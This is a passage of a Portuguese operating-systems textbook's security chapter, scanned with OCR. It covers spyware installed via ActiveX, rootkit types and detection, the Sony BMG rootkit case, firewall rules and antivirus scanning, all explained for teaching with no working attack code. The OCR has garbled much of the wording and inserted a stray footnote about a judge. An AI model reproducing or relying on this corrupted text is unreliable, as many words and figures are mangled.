ware e automaticamente copiado e instalado, A razao para 
alguns usuarios manterem esta configuraęab e que, quando 


I Poiier Stewart foi um juiz d.i Suprema Corte FcJcral tnirc os anus dtr 1 9SS l- 198], Ele ć famosd por rt-diglr urna opinało sobre um taso dc pornografia 
no 1411,1! admiti^ ser incapa/: dc definir pomtigrafia, mas di™ saber rcconhcte-Li qiuindo a via. 
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a seguranęa esta definida como Alta, muitos sites na o sao 
exibidos corretamente (ou sequer sao exibidos) ou o IE 
consiantemente pede permissao para tarefas que o usuario 
nao emende. 

Agora, imagine que o mve) dc seguranęa esta definida 
como Medio-Alio. Quando urna pagina infectada e visita- 
da, o IE detecia o controle ActiveX e abre u ma caixa de 
di a logo que contem u ma mensa gem fo nieci da peta panina. 
Ela pode dizer o seguime: 

Voc£ deseja copiar e instalar um programa para acelerar sua 
conexao com a internet? 

A maioria das pessoas vai achar esia unia boa idcia e 
clicar cm SIM. Bingo! Esscs usuarios ja eram. Os usuarios 
mais $o fis li ca dos padem ycriflcaro restante da caixa de dla- 
logo c dcscobrir dois outros iiens, Um deies e um link para 
um certiflcado da pa giną (eon formę discutimos na Seęao 
9.2 ,4), for nęci do por algunia auloridade cenificadora da 
qual nunca ouviram talar e quc nao contem informaęocs 
uieis alem das que ceriificam quc □ empresa cxistc e tcve 
dinbeiro su fi cienie para pa gar pelo cerLifkado. A outra e 
um link para ouira pagina, oferccido pela pagina sendo vi- 
siiada. Ela deveria explicar o que faz o com role AciiveX, 
mas, na yerdadc, pode ser sobre qualquer assmito e nor¬ 
malnienie explica o quao inarayilhoso 6 o eonlrole e como 
de ira mdhorar a sua expcriencia na Internei. De posse 
dessa informaęao fieticia, mesmo usuarios mais avanęados 
acabam clicando cm SIM, 

Se os usuarios cl i ca rem em NAO, costuma haver um 
script que se aprovciia de um erro no 1E e lenta fazer a 
cópia de ąualąuer forma. Se nao houver erros a serem ex- 
plorados, cle pode cominuar tentando copiar o controle 
AciiveX, fazendo o IE cxibir a catxa de di a logo a cada nova 
tentativa de cópia* A materia das pessoas nao sabe o que 
la zer (ir a o gcrenciadoi de larefas e cncerrar o IE) e acaba 
desistindo e clicando cm SIM. Bingo novamentc! 

O que normahnenie acoruece depois disso ć quc o 
spyware cxibe uma licenęa de 20 a 30 paginas, escrita em 
uma linguagem lamiliara Gcoffrey Chaucer, mas nao para 
os que nasceram depois dele e nao trabalhem na area juri- 
dica. Uma vez que o usuario aceiia a licenęa, pode perder 
o dircilo dc processar o vendcdor do spyware por conla 
do acordo cm deixar o spyware funcionar, embora algu- 
rnas Seis locais ignorem lais licenęas. (Sc a licenęa disser "O 
licenciado concede o dircilo irrcvogavd dc o forneccdor 
deste matar sua mae e reda mar sua heranęa", pode ser di- 
flcil convcnccr o tribunal quando chegar a hora de cobrar o 
pro mc U do, mesmo com a anuencia do licenciado.) 

Acoes executadas pelo spyware 

Agora vamos ver o que o spyware normabnenie faz. 
Todos os iiens na lisia a seguir sao comuns* 

1, Al tera r a pagina inicial do navegador, 

2. Modifkar a lista dc paginas favoritas do navegador. 


3. Adicionar uma nova barra de ferramentas ao nave- 
gador. 

4. Alterar o tocador de midia padrao do usuario. 

5. Alterar o buscador-padrao do usuario. 

6. Adicionar novos fcones a area dc trabalho do 
Windows. 

7. Substituir faixas de antmcio nas paginas da Web por 
out ras escolhidas pelo spyware. 

B. Colocar anundos nas caixas dc dialogo padrao do 
Windows. 

9. Gerar uma cadeia continua de anundos em pop-ups. 

Os primeiros tres iiens alteram o comportamcnio do 
navegadoi; normalnienie de um modo que nem a remi- 
cializaęao do sistemn reslaura os valorcs ameriores. Essc 
ataque ć conhcddo como sequestro do navegador. Os 
dois iiens seguintes alteram configuraęoes no rcgisiro do 
Windows, diredonando o tisuaiio inocente para um lo- 
cador de midia diferente (quc exibe os amincios que o 
spyware quer) e a uma ferramenta debusca diferente fque 
reiorna os sites que o spyware quer}. A criaęao de leones 
no desktop e uma tentaiiva óbvia de fazer com que o usu¬ 
ario execute novos programas instalados. A substituięao de 
faixas de anundo (imagens .$if com dimensao de 468 x 60) 
em paginas da Web subsequentes faz parecer que todas as 
paginas visitadas estao anunciando os siles cscolhidos pelo 
spyware. E o ultimo item, entretanto, que mais perturba: 
uma janda pop-up de aniincio quc pode ser fcchada, mas 
que imedialamcnte gera outra janda pop-up ad mfiniuwi 
sern que se consiga para-las, Alem disso tli do r algumas ve- 
zes o spyware desabilita o firewall, removc spywares con- 
correntes e executa outras aębes maliciosas, 

Muitos programas de spyware trazem desinstaladores, 
mas clcs raramentc fundonam c os usuarios inexpcricntes 
nao conseguem excluMos + Fdizmcmc, uma nova indiistria 
de software antispyware esta sendo criada e as empresas 
pro du to ras de antmrusja existenies tambeni estao eniran- 
do na area. 

Spyware nao deve ser confundido com adware, no 
qual fornccedorcs de software legitimos (porem pequenos) 
oferecem duas vcrsocs de scu produto; uma gra tui ta, com 
anundos, e outra paga, livre deies, Essas empresas dcixam 
be ni clara a existenda de duas versóes e sempre oferecem 
aos usuarios a opęao de fazer o upgrade para a versao paga 
e se łivrar dos anundos. 

9.7.5 I Rootkits 

Um rootkit c um programa ou conjunto dc progi a- 
mas c arquivos que tema csconder sua exisienda, mesmo 
dianie dos esforęos do proprietario da maquina infcctada 
para localiza-lo e rcmove-lo. Em gcral, o rootkit contem 
algtms lipos de malware que lambem estao sendo escondi- 
dos. Rootkits podem ser instalados por quaisquer um dos 
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metodos ja discutidos, induswe yfrus, vermcs e spyware, 
assim como de outras formas, entre as quais uma sera dis- 
cutida mais adiante. 

Tipos de rootkit 

Vamos agora dcscrcvcr os cinco tipos dc rootkits dispo- 
niveis atualmcntc, dc cima para baixo. Em Todos os casos, 
a ąuestao ć: On dc o rootkit sc esconde? 

1. Rootkits defirmware. Pdo mcnos na teoria, um 
rootkit poderia sc c scen der i n sto 3 a m l o na BIOS uma 
cópia dc si niesmo. Esse tipo dc rootkit tomaria o 
controle seinpre que a maąuina fosse inidalizada e 
tambem sempre quc uma lunęao dc BIOS fosse cha- 
mada. Se o rootkit se criptografasse depois de ca da 
uso e se descriptografasse antes dc cada uso, seria 
bastantc diffcil detcaa-lo. Hssc tipo de comporta- 
mento ainda nao foi observado, 

2. Rootkits de hipemsor. Um tipo ex trem a men te 
escorregadio de rootkit poderia executar um sisie- 
ma operarionai inteiro e todas as suas aplicaęoes 
cm uma maąuina yirtual sob seu controle. A pri- 
mdra prova desse concdlo, denominado blue pili 
(ou pflula azul, em referenda ao fil me Matrk), foi 
demonstrada por uma hacker polonesa, Joanna 
Rutkowska, em 2G0ó. Esse tipo de rootkit normał- 
mente modifica a seąuencia de iniciallzaęao de for¬ 
ma que, quando a ma q u i na e figa da. de executa 
o hipervisor na maąuina sem sistenia operacional 
e, cm seguida, irnda o sistema operacional e suas 
aplicaęoes em uma maąuina virtual. Assim como 
no metodo anterior, a foręa deste esta no fato de 
que nada e escondido no sistema operacional, nas 
bibliotecas ou nos programas e, portanto, a identifi- 
caęao do rootkit nessas areas nao acontece. 

3. Rootkits de nucleo, Aiualmcntc, o lipo mais co- 
mum de rootkit e o que infeda o sistema operado- 
nal e sc escondc neie como um driver de dispositivo 
ou modliło carregavel do nudeo. O rootkit pode 
fadlmente substituir um driver grandę, complexo 
c quc com frequencia e atualizado por outro quc 
contenha o drivcr antigo mais o rootkit. 


4. Rootkits de biblioteca. Outro lugar no qual root- 
kils podem se esconder e na biblioleca do sistema, 
como, por exemplo r a Uhc no Linux. Essa localizaęao 
confere ao malware a oportunidade de inspccionar 
os argumentos c retornar valores dc chamadas dc 
sistema, modificando-as conlormc su a ncccssidadc 
para mantcr-sc escondido. 

5. Rootkits de aplicaęao. Outro lugar para esconder 
um rootkit c dentro dc um aplicativo grandę, cm es- 
pedał os que criam muitos arquivos novos enąuan- 
to sao executados (perfis de usuarios, pre-visuatiza- 
ęao de imagens etc.). Esses novos arquivos sao bons 
locats para esconder qualquer coisa e ninguem acha 
estranho que eles existam. 

Os cinco rootkits podem se esconder conforme moslra- 
do na Figura 9*2S, 

Detecęao de rootkit 

E diffcil idem!licar rootkits ąuando nao sc pode conliar 
no hardware, no sistema operarionai, nas bibliotecas c nas 
aplicaęoes. Por exemplo, uma maneira óbvia de procurar 
rootkits e lisia udo todos os arquivos em disco. Entretanto, 
a chamada tle sistema que le um diretório, o procedimento 
da biblioteca que executa a chamada de sistema e o progra- 
ma que realiza a listagem sao todos pole n ciał menie rnali- 
ciosos e podem censurar os re suit ad os, omitindo quaisquer 
arquivos relarionados ao rootkit. Ainda assim existe espe¬ 
ranta, como descrevemosa seguir. 

A detecęao de um rootkit que micializa seu próprio 
hiperyisor e executa o sistema operacional e todas as apli¬ 
caęoes em uma maąuina yirtual sob seu controle e diffcil, 
mas nao impossfvel. Ela reąuer uma hwestigaęao cuidado- 
sa em busca das discrepandas no deseinpenho e na fundo- 
naiidade da maąuina yirtual comparada a maąuina real. 
Garfinkcl et al. (2007) sugeriram muitas delas, conforme 
descrevcmos a seguir. Carpenter et al. (2007) tambem dis- 
cmcm o assunto. 

Uma classe inteira de metodos de detecęao confia no 
fato de que o próprio hiperyisor utiliza recursos ffsicos, e 
a perda desses recursos pode ser identificada. Por exem- 
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I Figura 9.28 Cinco locais onde um rootkit pode se esconder. 
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plo, o próprio hipervisor prccisa acessar as entradas da TLB, 
competindo com a maquina virtual pelo uso desse escasso 
recurso. Um programa de detecęao poderia colocar pres- 
sao sobre a TLB, observar o desempenho e compara-lo ao 
dcscmpenho anteriormente mensurado no hardware scm 
sistema operadonal* 

O utrą classe de metodo de detecęao csta reladonada 
ao timing, cm espedal o dos disposiiivos de E/S. Imagine 
quc sejam nccessarios 100 cidos do rdógio para que se Ida 
o registro de urn dispositivo PCI qualqucr na maąuhia rcal 
e que esse tempo e altamenie reprodimveL Em um am- 
biente vinual o valor desse registro vem da memória, e sen 
tempo de leitura depende de eie estar na cache nfvel 1 da CPU, 
na cache do mvel 2 ou na RAM rcal. Um programa de de- 
tecęao poderia fadlmente foręa-lo a sc mover por entre es- 
ses eslatios e medir a variaęao no tempo de leitura* Observe 
que e a variaęao que importa, e nao o tempo de leitura. 

Outra arca que pode ser testada e o tempo que se ]cva 
para executar instruęóes privilegiadas, ern especial as que 
rcąuerem s orne me alguns po u cos cidos de rdógio no hard¬ 
ware rcal e cemenas ou milhares de cidos quando preci- 
sani ser emuladas. Por exemplo, sc a leitura de um regis* 
Iro protegido da CPU lcvai 1 ns no hardware rcal, nao ha 
como rccilizar um bilhao de desvios (Irdjtf) e emulaęoes em 
I s. Ś claro que o hipervisor pode memir e relatar o tempo 
da cmulaęao, em vcz do tempo rcal, cm lodas as chamadas 
de sistema quc envolvam tempo, O detector pode ignorar 
o tempo dc cmulaęao concctando-se a u ma maąuina ou 
site renioto que fomeęa um tempo-base preriso* Como o 
detector necessita somente medir imervalos de tempo (por 
exemplo, quanto tempo e necessano para executar um bi¬ 
lhao de Icituras dc um registro protegido), o desvio entre o 
rdógio local e o rdógio remoio nao faz diferenęa. 

Se nao existe nenii um hiperdsor entre o hardware e o 
sistema operadonal, o rootkit pode estar escondido dentro 
do sistema operadonal. E difidl idcmifica-lo por mcio da 
inidalizaęao do sistema, ja que o sistema operadonal nao 
ć con(iavd. O rootkit pode instalar um volume grandę dc 
arquivos — por cxemplo, todos coin nomes iniciados por 
'$$$_' — e nunca incluir esses arquivos quando os progra- 
mas do usuario exccutarem Icituras dc dircłórios* 

Sob essas drcunstancias, urna das manciras de identi- 
ticar o rootkit e inidalizar o computador a partir de urna 
nudia externa confiavel como um CD-ROM/D VD original 
ou um dispositivo USB. O disco pode, entao, ser varrido por 
um programa anti rootkit scm te mer que o próprio rootkit 
imeriira na varredura. Aliernatwamente, pode-se utilizar 
lim resiimo criptografico de ca da arquivo no sistema ope- 
raciona 1 e compara-lo a uma lista criada ąuando o sistema 
foi instalado e ann a żenada fora dek, onde nao podia ser 
altcrada. Sc nao cxistirem resumos criados, e posswel aili¬ 
da compuia-los ou simpksmente comparar os arquivos a 
partir do CD-ROM ou DVD de instalaęao. 


Os rootkits em bibliotecas e em programas de aplicaęao 
sao mais di l iceis de esconder, mas se o sistema operadonal 
tiver sido carregado a partir dc uma uhdia externa e e eon- 
fiavel, sens resumos tambem pudem ser comparados aos 
resumos anteriores annazenados no CD-ROM. 

Ate aqul a discussao tem sido em torno dos rootkits 
passivos, que nao interkrem no software de detecęao. Mas 
cxistcm tambem rootkits ativos, quc buscam c destroem 
o software de detecęao de rootkits ou a o menos o modi- 
ficam de forma que de anuncie: "NENHUM ROOTKIT 
ENCONTRADOI^. Isso requer medidas mais eomplicadas, 
mas, felizmente, nenhnm rootkit tem se comportado dessa 
mancira. 

Existem duas escolas de pensamento com relaęao ao 
que fazer depois que um rootkit e descobcrto. Uma escola 
sugere que o administrador do sistema deva agir como um 
cirnrgiao no tratamento dc um canccr: cxtraindo-o cuida- 
d osa men te. A outra acrcdiia que a tema li va de remoęao 
e niirito perigosa. Pudem existir pedaęos ainda escondidos 
em ouiros lugares. Nessa pcrspeciiya, a linica soluęao e re- 
verter para o ultimo backup com pieto que se saiba livre do 
rootkit. Se nao cxistlrem backups disponfveis r sera necessa- 
ria uma nova instalaęao a partir do CD-ROM/DYD originak 

O rootkit Sony 

Em 2005, a Sony BMC distribuiu varios CDs de audio 
contendo um rootkit. Ele foi descoberto por Mark Russi- 
novich (cofundador do sile <www.sysinternals.com>, de fer- 
ramentas cle administraęao do Windows), que na epoea 
trabalhaya no desenvolvimento dc um detector dc rootkit 
e espantou-sc quando cncontrou um rootkit em scu pró¬ 
prio sistema. Ele escreveu sobre o assunto em sen blog, c 
a historia logo se espalhou pela Internet e pela rnfdia de 
massa, Artigos cienulicos sobre o tema foram escritos (Ar- 
nab e Hutchison, 2006; Bishop e Frinckc, 2006; Fclten e 
Halderman, 2006; Halderman e Feitcii, 2006; Levine et aL r 
2006). Levou anos para que o furor dimimnsse. A seguir, 
descrevemos ra pi da men te o que aconteceu. 

Quando um usuario inscre um CD no drive de um 
computador Windows, o sistema busca um arquivo cha- 
mado autorunJnf, que eoniem uma lista das aęóes a serem 
exccutadas — a primeira normalmente e inicializar algum 
programa no CD (como urn assistentc de instalaęao), Em 
geral, os CDs de audio nao eon tem esses arquivos porque 
os tocadores $iand-abw de CD os i gn o ram caso existam. 
Aparentemenie, algum genie na Sony achou que seria ca- 
pazde impedir a pirataria de musicas induindo um arqihvo 
autorun.inf cm alguns dc sens CDs que, quando colocados 
em um computador, i ustala varn imediaia c silendosamen¬ 
ie um rootkit de 12 MB. Em seguida, uma licenęa de uso 
era exibida, mas nao mendonava nada sobre a instalaęao 
de um programa* Enquauto a licenęa era exibida, o soft¬ 
ware da Sony verificava se algum dos 200 programas de có- 
pia conhecidos estava sendo executado e, caso estivcsse, 





Sn#w 


Capftuio 9 Seguranęa 427 


mandava o usuario fechado. Caso concordasse com a licen- 
ęa e fechasse todas os programas de cópia, a musica come- 
ęaria a tocar; caso comrario, nao. Mesnio se o usuario nao 
concordasse com a licenęa, o rootkit permaneria instalado. 

Yamos ver como o rootkit fundonava, Ele inseria no 
nucleo do Windows um conjumo de arquivos cujos no- 
mes comeęavam com $sys$. Urn deles era urn filtro que 
interceptava lodas as chamadas de sistema a imidade de 
CD-ROM e proibia todos os programas de leifura, exceto o 
da Sony, de krem o CD. Essa medida tomava imposslvel a 
cópia do CD para o disco rfgido (o que e ilegal, alias). Um 
outro filtro interceptava todasas chamadas que Mam arqui- 
vos, processos e listagcns do rcgistro c cxcluia todas as en- 
tradas imdadas por $sys$ (mesmo dos programas que nao 
tinham relaęao alguma com a Sony c com musica) para 
esconder o rootkit. Essa e u ma abordagem basta nie coinnm 
para os novatos na area de criaęao de rootkits. 

Anies dc Rus$inovich descobrir o rootkit, esic foi am¬ 
pla nieme instalado — o quc nao c dc se estranhar, ja quc 
erain mais de 20 milhoes de CDs. Dan Kaminsky {2006) 
avaliou a extcnsao do lato c descobriu qnc mais de 500 mil 
redes mundo afora tinham sido infectadas. 

Quando a notfda foi divulgada, a reaęao i nicią! da Sony 
foi di zer que tinha todo o di rei to de proteger o que fossc dc 
sua propriedade intelectual. Em oma enirevLsta concedida 
a National Public Radia Thomas Hosso, presidente dc nc- 
gócios digitais da Sony BMG r disse: maioria das pessoas, 
imagino, sequer sabc o quc e um rootkit, entao por que 
dcveriam se preocupar?", Quando essa resposta comeęou 
a provocar tumulto, a Sony recuou e distribuiu um patek 
que removia os arquivos $sys$ escondidos, mas maminha o 
rootkit. Com o aumento da pressao, a Sony acabou dispo- 
nibilizando um desinstalador em sen sile, mas, para conse- 
gui-lo, os usuarios deviam Fornecer um endereęo de c-mait 
c concordar que a Sony Ihcs enviasse materiał promocional 
no futuro (o que a maioria denomina 'spam'). 

Mais adiante, descobriu-se que o desinstalador da Sony 
apresentava falhas tecnicas que tornavam o computador 
infectado ahameme vulncravel a ataąues pcla Internet. 
Revelou-se tamboru que o rootkit eon tinha código prove- 
niente de projetos de código aberto, o que viola os direitos 
a ul ora is desses programas (que permitem o uso livre do 
software desde que o código-fonte fosse distributrfo). 

Alom do desastre dc relaęoes publicas sem procedentes, 
a Sony tambern enfreiitou questóes judiciais. O estado do 
Texas processou a empresa por violaęao das leis anlispyware 
e por praticas comerdais enganosas {ja que o rootkit era 
instalado mesnio quando o usuario nao concordava com a 
licenęa). Mais tarde, 39 estados inidaram aędes cołetivas. 
Em dezembro de 2006, os ca sos foram en cena dos quando a 
Sony concordou em pagar 4,25 milhoes de dólares, parar de 
induir o rootkit em futuros CDs e concedcr a cada vrtima o 
dirdto dc copiar trćs albuns de urn cataiogoiimitado dc mii- 
sicas. Em Janeiro de 2007, a Sony admitiu que seu software 


tambern monitorava os habitos musicais dos usuarios e os 
relatava a empresa, o que vioiava mais urna lei america- 
na. Em um acordo com a Comissao Federal dc Comerdo, 
a Sony concordou em pagar 150 dólares a os usuarios que 
tiveram sens computadorcs danificados pclo software. 

A historia do rootkit da Sony foi induida especial- 
mente para os kitores que imaginam que o rootkit e uma 
curiosidade academica sem implicaęoes no mundo real. 
Uma busca na Internet por 'rootkit Sony' resultara em uma 
enorme variedade dc informaęoes adicionais. 


9.8 


Com pmhlemas surgindo em lodas as parłeś, exisie al¬ 
guma chance de tornar os sistemas seguros? Na verdadc, 
sini. Nas próximas seęóes, vamos ver algumas maneiras de 
projetar e implementar sistemas de forma a aumemar sua 
seguranęa. Um dos conceitos mais importantes e o de de- 
fesa em profundidade. Basicamente, a ideia e que voce 
deve ter multiplas camadas de seguranęa, de forma que, 
se uma delas for violada, ainda esistirao outras a serem 
yencidas. Imagine uma casa com uma cerca de ferro alta 
c pontuda a sua volta, detcctorcs dc movlmcnto no qutn- 
tal, dois cadeados de foręa industrial na porta da frente e 
um sistema dc alarmc computadorizado contra invasoes na 
parte interna, Em bora cada uma das tecnicas tenha seu va- 
lor, para roubar a casa o ladrao teria de der rota r todas elas. 
Os sistemas computacionais yerdadeiramente seguros sao 
como essa casa, com multiplas camadas de seguranęa. Ago¬ 
ra, vamos falar de algumas delas. As defesas nao sao bem 
hierarquicas, mas vamos comeęar falando da mais geral e 
cominuar ate as mais especfficas. 

9.8.11 Firewalls 

A habilidade de conectar um computador em qualquer 
parte do mundo a outro tambern em qualquer lugar ć uma 
vantagem com p li cada. Embora exista muito materiał va- 
lioso na Web, estar conectado a Imernet expoe o compu¬ 
tador a dois tipos de perigo: os de enłrada e os de salda. Os 
perigos de entrada induem os crackers tentando invadir o 
computador, bem como virus, spyware e outros tipos de 
malware. Os perigos de salda englobam a salda de infor- 
maędes confidenciais, como numeros de cartoes de erediro, 
senhas, dęciaraęóes de impostos e todo tipo de informaęao 
corporativa, 

Em consequencla disso, sao necessarios mecanismos 
capazes de mant er os bons bits 'dentro' e os maus bits 
lora'. Uma possibilkiade e utilizar um firewall, que e 
simplesmente uma adaptaęao moderna do antigo siste¬ 
ma ativo de defesa medieval: cavar um fosso bem fundo 
a o red oi do seu ca stelo, Esse pruj eto obrigava todos quc 
ent lassem ou safssem do castelo a passar por uma u ni. ca 
ponte Ievadięa ondc podiam ser impecionados pcia po li¬ 
da de E/S. O mesmo recurso ć posswel no caso das redes: 
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uma empresa pode ter diversas red es locais conectadas 
de forma arbitraria, mas lodo o trafego para dentro ou 
fora da empresa e foręado a passar por uma ponte de- 
tronica — o firewall. 

Existem duas variedades hasicas de firewall: os de hard¬ 
ware e os de software. As empresas que preeisam proteger 
redes locais normalmenie oplam por firewalls de hardware; 
ao passo que os usuarios doniesticos costumam escolher os 
firewalfs de software. Vamos falar um pouco mais sobre 
os firewalls de hardware, cujo modelo generico e apresen- 
tado na Figura 9.29. Nele, a conexao (via cabo oti fibra 
ótica) com o provcdor da rcdc c ligada ao firewall que, 
por sua vcz, ć coucciado a rcdc local, Ncnhum pacotc pode 
entrar ou sair da rcdc local sem a aprovaęao do firewall. 
Na pralka, os firewalls sempre se combi nam a roteadores, 
disposilivos de traduęao de endereęos de rede, sistemas de 
detecęao de iiwasao e outras coisas, mas hosso foco aqui e 
a fundonalidade do firewall. 

Os firewalls sao configurados com regras puc estabc- 
Iccem o quc pode passar c o quc dcvc ficar dc fora. O pro- 
prietario do firewall pode alterar as regras, normalmenie 
por mcio dc uma interface Web (a maioria dos firewalls 
possui um minisservidor Web embuiido que pennite esse 
procedimemo). No tipo mais simples de firewall o firewall 
sem estado, o cabeęalho de eada pacoie que irafega e ins- 
pecionado e o firewall decide se ele passa ou e descartado 
com base somente na informaęao do cabeęalho e nas re¬ 
gras do firewall. As informaęóes no cabeęalho do pacote 
incluem sua origem, os endereęos 1P dos destinatarios, as 
portas de origem e desłino, os tipos de servięo c o proło- 
colo. Outros campos estao disponweis, mas raramente sao 
avaliados pelas regras. 

No exemplo mostrado na Figura 9.29, vemos tres ti¬ 
pos de servidores, cada um com um endereęo IP unico no 
formato 207*68.160,x, onde x c 190, 191 ou 192, respecti- 
vamente, Esses sao os endereęos para os quais os pacotes 
dcvcm ser cnviados para que cheguem aos servidores. Os 
pacotes entrando tambćm contem um iiumero de porta 
de 16 bits, o qual cspcrifka o processo da maquina para o 
qual o pacote esta destinado (um processo pode monitorar 
o trafego de enirada de uma porta), Atgumas portas tem 
senięos-padrao associados a das. Em pariicular, a porta 80 
e uiilizada para a Web, a porta 25 e uiilizada para e mail e a 
porta 21 e uiilizada para o servięo FTP {transferencia de ar- 


qtiivos), mas a maioria das outras esta disponwel para ser- 
vięos definidos pelo usuario. Sob essas condięoes, o firewall 
deve estar configurado da seguinte maneira: 


Endereęo IP 

Porta 

Aęao 

207.68.160.190 

80 

Aceitar 

207.68,160.191 

25 

Acoitar 

207,68.160,192 

21 

Aceitar 

* 

ir 

Negar 


Essas regras permitem que os pacotes sejam encami- 
nhados a maquma 207,68.160,190, mas somente sc estive- 
rern destlnados a porta 30; todas as outras portas dessa rna- 
quina sao desabilitadas e os pacotes destlnados a clas sera o 
silenciosameme descartados pelo firewall. De modo seme- 
Iharue, os pacotes podem ir para os outros dois servidores se 
estivcrcm endcreęados as portas 25 c 21, respcciWamcnte. 
Todo trafego com outro deslino e descartado, Exceto pelos 
tres servięos publicos sendo ofer cci dos, esse conjunto de re¬ 
gras difkulta que um atacante obtenha acesso a rcdc local. 

E possivel com udo, aiacar uma rede local mes ino com 
o firewall Sc o servidor weh e apache, por exemplo, c o 
cracker descobriu um erro neste tipo de scrvidor que pode 
ser explorado, pode ser que de consiga enviar um URL bas- 
tante longo para 207.68.160.190 na porta 80 c foręar um 
transbordamento dc buffer — o quc lhe permitiria tomar 
uma das maąmnas dentro do firewall e usa-la para disparar 
um aiaąue a outras maąuinas na rede local. 

Outro possfyel ataque e escrever e publicar um jogo 
para miiltiplos jogadores e alcanęar ampla aceitaęao. O 
software do jogo prccisa de alguma porta para se conectar 
a outros jogadores e, assim, seu projctisia pode escolher 
uma porta — a 9876, por exemp!o — e dizer aos outros 
jogadores que modifiąuem as regras do firewall de forma a 
permitir o trafego de entrada e saida por essa porta* Os que 
abrirem essa porta licam suscetweis a ataques a da, o que 
pode ser fatil — cm cspecial se o jogo contem um cavalo 
de Troia que aceita determinados comandos remotos e os 
cxccuta. Mesmo quc o jogo seja legitimo, emretamo, de 
pode comcr erros exploraveis. Quanto maior a ąuantida- 
de de portas abertas, maior a possibilidade de um aiaąue 
acoiilecer. Todo bu raco aumcma a chancc de uma iiwasao. 

Alem dos firewalls sem esiado, existem os firewalls 
com estado, que controlam as conexoes e o estado em 


207.68.160.190:80 207.68.160.191:25 207.68,160.192:21 



1 Figura 9,29 Uma vi$&o simplificada de om firewall de hardware protegendo uma rede local com tres compuiadores. 
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que estao. Esses firewalls sao melhores no combate a certos 
tipos dc ataque, em especial aąueles relacionados a cria- 
cao de conexoes. Ha ainda omro tipo de firewall que im- 
plementa urn IDS [intrusion deteaion system — sistema de 
detecęao de intrusao) no qnal o firewall inspcciona nao só 
o cabcęatho dos pacotes, mas tambem seu contcudo, em 
busca dc materiał suspeito. 

Os li rewa lis de software, algumas vezes chamados dc 
firewalls pessoais, fazem a mesma coisa que os firewalls 
de hardware, mas no software. Eles agem como fiłtros puc 
se conectam ao código da rede dentro do nudeo do sistema 
operadonal e filtram os pacotes do mesrno modo qne o 
firewall de hardware. 

9-8-21 Tecnicas antmrus e antiantmrus 

Os firewalls tentam mant er os intrusos fora do compma- 
dor, mas podem falhar dc diversas forma s, eon formę des- 
crcycmos. Ncssc caso, a próxima linha de defesa comprccn- 
de os program as autimalware, comumente chamados de 
programas antmrus — embora muitos sejam capazcs 
de comba ter tambem vcrmes e spyware, Os yfrus tentam 
sc escondcr c os usuarios tern a m cncontra-Jos, o que leva 
a um jogo de gato e rato, Com relaęao a isso, os virns sao 
como rootkits, cncclo pdo falo dc quc a maioria dos cria- 
dores dc vfrus enfaliza a rapida dislribuięao em vez dc brin- 
carem de esconde-esconde, como os rootkits. Agora, vanios 
ver algumas tecnicas milizadas pdos antiyfrus e tambem 
como Virgfiio responde a elas. 

Verifitadore$ de viru$ (vfrv$ scanners) 

Evidememente, o usuario medio, comtim, nao vai en- 
contrar muitos yfrus, quc fazem o nmirno para se escon- 
den Para isso, o mercado desenvolveu o software antmrus. 
A seguin discutiremos como esse software fundona, As 
empresas de software amivirus lem laboratórios nos quais 
cientistas trabalham por longas jomadas procitrando cn- 
tender novos yfrus, O primeiro passo e fazer o yfrus infectar 
um programa que nao faz nada, mnitas vczcs cha mado dc 
arqiiivo eobaia { goatfik }, a firn de obter unia copia do vf- 
rus em sua forma mais pura. O próximo passo c fazer urna 
lisi agem exaia do código do yfrus e inseri-lo em um ban¬ 
ce de dados de vfms conhecidos. As empresas competem 
entre si pdo lamanho de seus bancos de dados. Iiwentar 
novos vfrus, apenas para inflar seu banco de dados, nao e 
considerado u ma alitu dc esporliva. 

Urna vcz que um programa antiyfrus esteja instalado 
na maąuina do clicnte, a primcira coisa a fazer c yerificar 
todos os arquivos exeaHśvds do disco, procurando algum 
dos vfrus que estejam no banco de dados de yfrus conhe¬ 
cidos. A maioria das empresas de antmrus tern um ske da 
Web, tle ornie os clientes podem transferiras descrięoes dos 
vfms descobertos mais recemememe para sens bancos de 
dados. Se o usuario tiver dez mil arquivos e o banco de 
dados tivcr dez mil yfrus, fi cara evideiilc que e pretiso um 
programa mais inteKgcnte para agilizar isso. 


Como pequenas variaęoes dos yfrus ja conhecidos sur- 
gem a toda hora, e necessario fazer urna busca difusa; desse 
modo, uma mudanęa de 3 bytes em um vfrus nao o dei- 
xa cscapar da detecęao. Contudo, as bnscas difusas nao só 
sao mais lentas que as buscas exatas, mas tambem podem 
disparar alarmes lalsos, isto ć, alertas sobre arquivos Icgfti- 
mos que podem conter algum código yagamente parecido 
com um yfrus, como aconteceu com o Pakistan 7, ha al- 
guns a nos, O que o usuario deve fazer diante da seguinte 
me osa gem: 

AVISO! O arquivo xyz.exe pode conter o yfrus lahore-9x, 

Deseja remov§-lo? 

Quanto mais yfrus no banco dc dados e quanto mais 
amplo for o critcrio com rclaęao a um accrto, mais aiarmes 
falsos ocorrerao. Se houver muitos vfrus, o usuario, des- 
gostoso, desistira da yerificaęao, Mas se o verificador de vf- 
rus exiglr que a similaridade seja miiito próxima, ele pode- 
ra deixar passar algum vfrus modificado. Fazer a coisa certa 
depende de um dclicado eąuilfbrio lieunstico. O ideał seria 
quc o laboratório tentasse identiflcar algum nuclco de có¬ 
digo no virus quc nao se altcrassc muito c, entao, usar esse 
nudeo como uma assinamra do vfrus em sua verilicaęao. 

Nao e porque o disco foi declarado livre de vfrus na 
ultima semana que ele ainda esta sem vfrus; portanto, o 
verificador de vfrus dcvc cxccutar com frcqucncia. Como 
a Ycrificaęao c lenta, e mais efidente yerificar somente os 
arquivos que foram alterados desde a dala da ultima verifi- 
caęao, O problema e que um vfrus inteligente, para evitar a 
dctecęao, volla a data - hora rio de um arquivo infeetadopara 
sua data-hora rio origlnal. A resposta do programa antiyfrus 
a isso e yeri ficar a data-hora rio em que o direiório foi modi¬ 
ficado peta ultima vez, A resposta do vfrus e volrar tambem 
a data-hora rio do direiório para a odginał. Esse e o infcio 
do jogo de galo e rato mendonado no inicio desta seęao. 

Omro modo que um programa antiyfrus tern de de- 
lectar a infecęao de um arquivo e registrar e armazenor no 
disco os tamanhos de todos os arquivos, Se o tamanho de 
um arquivo cresceu desde a ultima ycrificaęao, ele pode 
estar infectado, conforme mostram as figuras9.3Q(a) e (b), 
Contudo, um yfrus mais esperto pode eviiar a detecęao 
comprimindo o programa e preenchendo o restante do ar- 
quivo com algum vaior ate chegar a seu lamanho odginał. 
Para que esse esquema funcione, o yfrus deve conter as 
rot i nas de com]3ressao e descompressao, conforme mostra 
a Figura 9.30(c). Outra maneira de o yfrus temar escapar 
